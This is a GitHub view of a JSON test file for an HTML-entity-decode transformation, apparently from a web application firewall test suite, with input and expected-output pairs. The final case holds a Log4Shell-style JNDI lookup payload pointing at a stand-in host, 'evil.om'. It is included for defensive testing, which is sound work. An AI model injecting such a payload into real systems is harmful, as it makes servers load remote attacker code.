-
Notifications
You must be signed in to change notification settings - Fork 18
/
Copy pathhtmlEntityDecode.json
58 lines (58 loc) · 1.6 KB
/
htmlEntityDecode.json
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
[
{
"name" : "htmlEntityDecode",
"input" : "",
"type" : "tfn",
"ret" : 0,
"output" : ""
},
{
"output" : "TestCase",
"ret" : 0,
"input" : "TestCase",
"type" : "tfn",
"name" : "htmlEntityDecode"
},
{
"ret" : 0,
"type" : "tfn",
"input" : "Test\\u0000Case",
"name" : "htmlEntityDecode",
"output" : "Test\\u0000Case"
},
{
"output" : "&#xg;&#Xg;&#xg0;\\u0002g;&#a;\\u0000&#a2;\\u0003a&#a00;\\u0001a0;\na;&foo;",
"ret" : 1,
"input" : "&#xg;&#Xg;&#xg0;g;&#a;\\u0000&#a2;a&#a00;a0;
a;&foo;",
"type" : "tfn",
"name" : "htmlEntityDecode"
},
{
"ret" : 1,
"name" : "htmlEntityDecode",
"input" : "&#xg&#Xg&#xg0g&#a\\u0000&#a2a&#a00a0
a&foo",
"type" : "tfn",
"output" : "&#xg&#Xg&#xg0\\u0002g&#a\\u0000&#a2\\u0003a&#a00\\u0001a0\na&foo"
},
{
"output" : "\\x00\\x00\\x20\\x20\\x00\\x20\\x00\\x64\"&<>\\xa0",
"type" : "tfn",
"input" : "��  � \\u0000d"&<> ",
"name" : "htmlEntityDecode",
"ret" : 1
},
{
"output" : "\\x00\\x00\\x20\\x20\\x00\\x20\\x00\\x64\"&<>\\xa0",
"ret" : 1,
"name" : "htmlEntityDecode",
"input" : "��  � \\x00d"&<> ",
"type" : "tfn"
},
{
"output" : "${jndi:ldap://evil.om/w}",
"ret" : 1,
"name" : "htmlEntityDecode",
"input" : "${jndi:ldap://evil.om/w}",
"type" : "tfn"
}
]